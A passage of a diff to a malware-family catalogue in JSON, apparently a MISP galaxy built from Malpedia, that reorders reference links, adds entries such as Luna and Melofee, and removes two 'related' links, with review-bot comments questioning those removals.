"https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability",
"https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/",
- "https://twitter.com/IntezerLabs/status/1259818964848386048",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
- "https://unit42.paloaltonetworks.com/cve-2020-25213/",
- "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
- "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html",
- "https://unit42.paloaltonetworks.com/atoms/moneylibra/",
- "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html",
"https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/",
- "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
+ "https://twitter.com/IntezerLabs/status/1259818964848386048",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://unit42.paloaltonetworks.com/cve-2020-25213/",
+ "https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html",
+ "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
"https://redcanary.com/blog/kinsing-malware-citrix-saltstack/",
- "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
- "https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html"
+ "https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [
"h2miner"
@@ -4766,10 +5227,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kobalos",
- "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf",
"https://team-cymru.com/blog/2021/02/05/kobalos-malware-mapping/",
"https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
- "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/"
+ "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf"
],
"synonyms": [],
"type": []
@@ -4822,8 +5283,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.lilock",
"https://www.bleepingcomputer.com/news/security/lilocked-ransomware-actively-targeting-servers-and-web-sites/",
- "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html",
- "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/"
+ "https://fossbytes.com/lilocked-ransomware-infected-linux-servers/",
+ "https://id-ransomware.blogspot.com/2019/07/lilu-lilocked-ransomware.html"
],
"synonyms": [
"Lilocked",
@@ -4852,21 +5313,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.liquorbot",
- "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/",
- "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/"
+ "https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/",
+ "https://www.zdnet.com/article/naive-iot-botnet-wastes-its-time-mining-cryptocurrency/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e537e165-ea8b-4e75-8813-6519632d3f6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3fe8f3db-4861-4e78-8b60-a794fe22ae3f",
"value": "LiquorBot"
},
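Review bot: this hunk silently drops the whole `related` array for LiquorBot (the `similar` link to `e537e165-ea8b-4e75-8813-6519632d3f6a`) while the refs are merely reordered; nothing in the diff says whether the relationship was retracted upstream or lost by the export. Confirm it is intentional, and if relations are no longer carried by this galaxy, say so in the commit message since downstream consumers may rely on them.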
@@ -4875,15 +5327,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.lockbit",
- "https://www.ic3.gov/Media/News/2022/220204.pdf",
- "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
- "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
"https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/"
+ "https://blog.compass-security.com/2022/03/vpn-appliance-forensics/",
+ "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
+ "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
+ "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://security.packt.com/understanding-lockbit/",
+ "https://analyst1.com/ransomware-diaries-volume-1/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.ic3.gov/Media/News/2022/220204.pdf",
+ "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants"
],
"synonyms": [],
"type": []
@@ -4896,9 +5354,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.loerbas",
- "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html",
"https://www.cadosecurity.com/2020/05/16/1318/",
- "https://twitter.com/nunohaien/status/1261281419483140096"
+ "https://twitter.com/nunohaien/status/1261281419483140096",
+ "https://atdotde.blogspot.com/2020/05/high-performance-hackers.html"
],
"synonyms": [],
"type": []
@@ -4932,13 +5390,27 @@
"uuid": "cfcf8608-03e7-4a5b-a46c-af342db2d540",
"value": "Lootwodniw"
},
+ {
+ "description": "ESXi encrypting ransomware written in Rust.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.luna",
+ "https://nikhilh-20.github.io/blog/luna_ransomware/",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bc9022d6-ee65-463f-9823-bc0f96963a75",
+ "value": "Luna"
+ },
{
"description": "Cisco Talos compared this RAT to Cobalt Strike and Sliver. Written in Rust.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.manjusaka",
- "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
- "https://github.com/avast/ioc/tree/master/Manjusaka"
+ "https://github.com/avast/ioc/tree/master/Manjusaka",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html"
],
"synonyms": [],
"type": []
@@ -4951,24 +5423,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta",
- "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7",
"https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/",
- "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes"
+ "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes",
+ "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7"
],
"synonyms": [
"PureMasuta"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1d4dec2c-915a-4fef-ba7a-633421bd0848",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd",
"value": "Masuta"
},
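Review bot: as in the LiquorBot hunk, the `related` block for Masuta (the `similar` link to `1d4dec2c-915a-4fef-ba7a-633421bd0848`) is removed with no replacement; if dropping relations is a deliberate policy change it should be applied and documented consistently, otherwise the relation should be restored.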
@@ -4985,18 +5448,33 @@
"uuid": "4e989704-c49f-468c-95e1-1b7c5a58b3c4",
"value": "Matryosh"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.melofee",
+ "https://blog.exatrack.com/melofee/"
+ ],
+ "synonyms": [
+ "Mélofée"
+ ],
+ "type": []
+ },
+ "uuid": "1ffd85bd-389c-4e04-88fd-8186423c3691",
+ "value": "Melofee"
+ },
{
"description": "MESSAGETAP is a 64-bit ELF data miner initially loaded by an installation script. It is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.messagetap",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://attack.mitre.org/groups/G0096",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/"
],
"synonyms": [],
"type": []
@@ -5009,8 +5487,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.midrashim",
- "https://www.guitmz.com/linux-midrashim-elf-virus/",
- "https://github.com/guitmz/midrashim"
+ "https://github.com/guitmz/midrashim",
+ "https://www.guitmz.com/linux-midrashim-elf-virus/"
],
"synonyms": [],
"type": []
@@ -5023,8 +5501,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md",
- "https://securitykitten.github.io/2016/12/14/mikey.html"
+ "https://securitykitten.github.io/2016/12/14/mikey.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-12-14-mikey.md"
],
"synonyms": [],
"type": []
@@ -5037,64 +5515,66 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093",
- "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html",
- "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/",
- "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
- "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/",
- "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
- "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign",
- "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot",
- "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
- "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine",
- "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html",
- "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
- "https://synthesis.to/2021/06/30/automating_string_decryption.html",
- "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/",
- "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
"https://www.cadosecurity.com/technical-analysis-of-the-ddos-attacks-against-ukrainian-websites/",
- "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
- "https://github.com/jgamblin/Mirai-Source-Code",
- "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/",
- "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
- "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
- "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html",
- "https://www.youtube.com/watch?v=KVJyYTie-Dc",
- "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
- "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/",
- "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
- "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/",
- "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/",
+ "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/",
"https://blog.reversinglabs.com/blog/mirai-botnet-continues-to-plague-iot-space",
- "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18",
- "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
- "http://osint.bambenekconsulting.com/feeds/",
- "https://community.riskiq.com/article/d8a78daf",
- "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/",
- "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
+ "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
+ "https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html",
"https://isc.sans.edu/diary/22786",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "http://osint.bambenekconsulting.com/feeds/",
+ "https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/",
+ "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/",
+ "https://community.riskiq.com/article/d8a78daf",
+ "https://www.politie.nl/nieuws/2019/oktober/2/11-servers-botnet-offline.html",
+ "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
+ "https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/",
+ "https://www.zscaler.com/blogs/security-research/threatlabz-analysis-log4shell-cve-2021-44228-exploit-attempts",
+ "https://exchange.xforce.ibmcloud.com/collection/InfectedNight-Mirai-Variant-With-Massive-Attacks-On-Our-Honeypots-dbea3e9e39b8265e729545fa798e4d18",
+ "https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
+ "https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/",
+ "https://cert.gov.ua/article/37139",
+ "https://synthesis.to/2021/06/30/automating_string_decryption.html",
+ "https://www.youtube.com/watch?v=KVJyYTie-Dc",
+ "https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx",
+ "https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/",
+ "https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/",
+ "https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability",
+ "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants",
+ "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
+ "https://socradar.io/what-you-need-to-know-about-russian-cyber-escalation-in-ukraine/",
"https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html",
+ "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group",
+ "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/",
+ "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/",
+ "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet",
+ "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/",
+ "https://www.netscout.com/blog/asert/ddos-attack-campaign-targeting-multiple-organizations-ukraine",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093",
+ "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/",
+ "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
+ "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
+ "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
"https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai",
- "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/",
+ "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
+ "https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/",
+ "https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/",
"https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html",
- "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt",
- "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/",
- "https://blog.netlab.360.com/rimasuta-spread-with-ruijie-0day-en/",
- "https://cert.gov.ua/article/37139",
- "https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants",
- "https://prod-blog.avira.com/katana-a-new-variant-of-the-mirai-botnet",
- "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/",
- "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
- "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
- "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
+ "https://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html",
"https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
- "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet",
- "https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/"
+ "https://www.fortinet.com/blog/threat-research/totolink-vulnerabilities-beastmode-mirai-campaign",
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
+ "https://github.com/jgamblin/Mirai-Source-Code",
+ "https://forensicitguy.github.io/extracting-indicators-from-packed-mirai/",
+ "https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
],
"synonyms": [
"Katana"
@@ -5135,12 +5615,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot",
- "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
- "https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability",
- "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b",
"https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
+ "https://unit42.paloaltonetworks.com/moobot-d-link-devices/",
+ "https://otx.alienvault.com/pulse/6075b645942d5adf9bb8949b",
"https://blog.netlab.360.com/ddos-botnet-moobot-en/",
- "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/"
+ "https://blog.netlab.360.com/moobot-0day-unixcctv-dvr-en/",
+ "https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability"
],
"synonyms": [],
"type": []
@@ -5169,17 +5649,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mozi",
- "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet",
"https://www.microsoft.com/security/blog/2021/08/19/how-to-proactively-defend-against-mozi-iot-botnet/",
- "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/",
- "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
- "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/",
- "https://blog.netlab.360.com/mozi-another-botnet-using-dht/",
- "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/",
"https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/",
"https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/",
+ "https://www.nozominetworks.com/blog/overcoming-the-challenges-of-detecting-p2p-botnets-on-your-network/",
+ "https://blog.netlab.360.com/mozi-another-botnet-using-dht/",
"https://www.youtube.com/watch?v=cDFO_MRlg3M",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf"
+ "https://blog.centurylink.com/new-mozi-malware-family-quietly-amasses-iot-bots/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/",
+ "https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis/",
+ "https://www.elastic.co/blog/collecting-and-operationalizing-threat-data-from-the-mozi-botnet"
],
"synonyms": [],
"type": []
@@ -5188,12 +5668,12 @@
"value": "Mozi"
},
{
- "description": "",
+ "description": "MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.\r\n\r\nMrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack",
- "https://news.drweb.com/?i=5760&c=23&lng=en",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf"
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://news.drweb.com/?i=5760&c=23&lng=en"
],
"synonyms": [],
"type": []
@@ -5232,9 +5712,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ngioweb",
- "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/",
"https://blog.netlab.360.com/an-analysis-of-linux-ngioweb-botnet-en/",
- "https://twitter.com/IntezerLabs/status/1324346324683206657"
+ "https://twitter.com/IntezerLabs/status/1324346324683206657",
+ "https://blog.netlab.360.com/linux-ngioweb-v2-going-after-iot-devices-en/"
],
"synonyms": [],
"type": []
@@ -5262,13 +5742,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.notrobin",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
- "https://news.sophos.com/en-us/2020/05/21/asnarok2/",
"https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html",
- "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
"https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html",
+ "https://dcso.de/2020/01/16/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
+ "https://blog.dcso.de/a-curious-case-of-cve-2019-19781-palware-remove_bds/",
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/"
+ "https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/",
+ "https://news.sophos.com/en-us/2020/05/21/asnarok2/"
],
"synonyms": [
"remove_bds"
@@ -5296,13 +5776,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari",
+ "https://twitter.com/ankit_anubhav/status/1019647993547550720",
+ "https://twitter.com/hrbrmstr/status/1019922651203227653",
"https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863",
"https://twitter.com/360Netlab/status/1019759516789821441",
"https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html",
- "https://twitter.com/ankit_anubhav/status/1019647993547550720",
"https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/",
- "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/",
- "https://twitter.com/hrbrmstr/status/1019922651203227653"
